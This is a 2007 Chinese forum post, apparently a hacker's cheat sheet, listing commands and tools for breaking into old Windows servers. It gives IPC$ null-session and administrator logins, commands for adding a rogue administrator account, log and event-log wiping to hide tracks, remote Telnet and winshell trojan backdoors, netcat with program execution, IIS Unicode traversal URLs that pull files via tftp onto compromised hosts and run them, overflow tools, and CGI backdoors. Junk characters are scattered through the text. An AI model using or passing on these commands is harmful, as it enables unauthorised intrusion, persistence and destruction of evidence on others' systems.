找回密码
 入住遨海湾
搜索
网站解决方案专享优惠-3折上云
查看: 721|回复: 0

网管和黑客都必须知道的命令

[复制链接]
发表于 2007-12-22 22:40:00 | 显示全部楼层 |阅读模式

登录后查才能浏览下载更多咨询,有问题联系QQ:3283999

您需要 登录 才可以下载或查看,没有账号?入住遨海湾

×
  与远程主机建立空管连接 net use \IP地址ipc$ "" /use:"" 2 A: Z: t' L3 [" _& t   以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator" 9 {& ?& l7 x! V/ W( @  传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$ 3 s) q) d& \* Y* d' q  查看远程主机时间 net time \IP地址 7 ?4 q- N% w: p4 D. @- b/ ^3 B7 C/ W   定时启动某个程序 at \IP地址 02:18 readme.exe ( J3 c" h, _. e0 t" A# A   查看共享 net view \IP地址 ' |" s: P9 o; B- l. b& E1 o  查看netbios工作组列表 nBTstat -A IP地址 3 U, n5 q8 e; B7 M7 m$ P5 G  将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator" ! E3 |, r6 k* i1 D# G   这两条把自己增加到管理员组: net user 用户名 密码 /add 8 d* b) b$ p$ }& X, P- @   net locaLGroup Administrators 用户名 /add 7 H& F& K% a# N   断开连接 net use \IP地址ipc$ /delete ; L1 o! m. ~2 r# m! z0 S' E 3 K& K; B P2 r/ M4 e  扫尾: & @. t8 d6 ?3 A. f5 O  del C:winntsystem32logfiles*.* : ^! Q( m8 E9 Q3 C6 m% O  del C:winntssytem32config*.evt 7 ^, r5 L, Z: e s  del C:winntsystem32dTCLog*.* % a' }" e! z/ ]) m0 c  del C:winntsystem32*.log ! F0 ~3 p* t& B( S$ J2 {  del C:winntsystem32*.txt ( F. d: ?2 j0 r   del C:winnt*.txt * W6 ], K& ^0 Y3 j; a  del C:winnt*.log & l8 h; Q( t/ S4 C& `& T# c ) e1 b; V; ~) H- W6 M8 e( F$ v 一、netsvc.exe 9 \( X* M/ U8 i$ I# [   下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: , x! |& B$ S6 w6 t+ x6 y1 P   netsvc /list \IP地址 8 t3 d- J8 J8 P9 L* @6 X! S  netsvc schedule \IP地址 /query ! E+ p T. K, |8 |5 P+ J2 O  netsvc \IP地址 schedule /start ( x. h6 U3 [7 P% N% H5 i; F H7 w4 V 二、OpenTelnet.exe i: z( e+ j, Q! [, ] b% j  远程启动主机的Telnet服务,并绑定端口到7878,例如: ; t" y2 q* U0 R, j# s   OpenTelnet \IP地址 用户名 密码 1 7878 0 P$ S% a( ?( b7 o0 X- D: L   然后就可以telnet到主机的7878端口,进入DOS方式下: : _. R X1 J& o# a- {& s; ~  telnet IP地址 7878 : U3 P6 L0 J% l: r Z" P6 ? 6 \& D" K( q: r- N; U3 {三、winshell.exe 5 y3 M: P, F, T8 l  一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: 2 t0 R0 y4 f( e4 O& G   p Path (查看winshell主程序的路径信息) , M+ U; n' U# k6 E( H& i0 a  b reBoot (重新启动机器) 4 e% i/ x# L Q0 D* ^* a2 C: m   d shutDown (关闭机器) 9 M8 s& c, O" a4 Y. [3 h6 Q   s Shell (执行后你就会看到可爱的“C:>”) 2 p, u. I ?4 I" d: [   x eXit (退出本次登录会话,此命令并不终止winshell的运行) - ~! w6 [6 M6 H5 [( A" m  CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) , l; C! D( u; Q/ z 0 W6 W# E4 ~$ h! y. }4 p四、3389登陆器,GUI方式登录远程主机的 4 |! l! V$ M3 [0 Y$ T: ?5 w 9 D+ \: I. Y0 i2 j* k五、elsave.exe 0 n' B' f$ W5 d# M& @! H  事件日志清除工具 9 x) J3 m6 g- }* z* k, E   elsave -s \IP地址 -l "application" -C 9 b+ @4 z o6 q2 O- Z6 X2 E3 t( C  elsave -s \IP地址 -l "system" -C - V! Y/ Q( t) Y+ A1 ?  elsave -s \IP地址 -l "security" -C % {/ n$ }3 {) ^1 `6 x1 i) c  执行后成功清除应用程序日志,系统日志,安全日志 - K" I; {) N) }* Q 六、hbulot.exe , d$ b3 _6 t$ P% |( V  开启win2kserver和winxp的3389服务 6 Z5 j& z3 \0 g7 }" B; t w/ g/ n  hbulot (/r) ( ~/ Q/ a( A$ [8 o 3 R. k4 y7 a6 S, o1 c' T9 y( d七、nc.exe(netcat.exe) ( {; r$ @# U& a+ K. ^) ^; a/ i) v   一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 9 Z7 a9 @: o4 T  想要连接到某处: nc (-options) hostname port(s)(ports) ... 3 S# y' R, A% x5 w   绑定端口等待连接: nc -l -p port (-options) (hostname) (port) ' t; q; d+ P s% _; Y1 I T # A! o; r' Q& G( p% A+ {# k参数: 9 J7 E+ w- h/ b8 K* [1 p8 {- U: s% d   -e prog 程序重定向,一旦连接,就执行 (危险!) 2 E h- _, w* |* r' F% W1 A8 W  -g gateway source-routing hop point(s), up to 8 t3 k$ T- Z% X  -G num source-routing pointer: 4, 8, 12, ... 5 C" [$ o m7 `5 ]* T8 k  -h 帮助信息 : N9 `$ d% d+ h  -i secs 延时的间隔 & p& h) I, K: h   -l 监听模式,用于入站连接 0 b( ]3 Z, g" q# Q0 E" B  -n 指定数字的IP地址,不能用hostname ' [3 c, P3 X6 `$ Z+ b. A! R! @5 w4 [  -o file 记录16进制的传输 % Y, v% V, U6 _2 B- K0 t0 s- X5 j4 N   -p port 本地端口号 / y4 W; X7 S' _/ V4 S. O4 j: g   -r 任意指定本地及远程端口 3 f1 z" v+ N( Q: v  -s addr 本地源地址 / |# S! u, `7 D N- }2 E1 H  -u UDP模式 * K- T% R% N. U% `/ R- p5 r  -v 详细输出——用两个-v可得到更详细的内容 " G/ N! v7 b" D2 X  -w secs timeout的时间 * j- Y; ~9 ?' }2 o9 e   -z 将输入输出关掉——用于扫描时 ; D+ b! g! `& r; U: v: z. V, X6 A7 t* X: p9 T. M! x9 _0 S) W2 v8 S 八、TFTPD32.EXE * ?& r) {: e* S0 h) P/ ]1 c% t  把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: - ~3 H6 X- D4 z- v$ [. _* {  http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名 0 `1 ^ \: g. i; p' N: [6 ~  然后可以直接令文件运行: , x p# z/ |" m/ u   http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 ; r. o; n8 n( u% q+ O# R5 j4 i A! |( b' W, C3 m1 p1 O- p 九、prihack.exe是IIS的printer远程缓冲区溢出工具; L# n2 c- |6 R# r6 ^# R: n   idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 & p* J- w( S* | " [+ e# R7 o- M一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
遨海湾-心灵的港湾 www.aosea.com
您需要登录后才可以回帖 登录 | 入住遨海湾

本版积分规则

网站解决方案专享优惠-3折上云

QQ|手机版|小黑屋|遨海湾超级社区

GMT+8, 2025-2-22 16:54

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表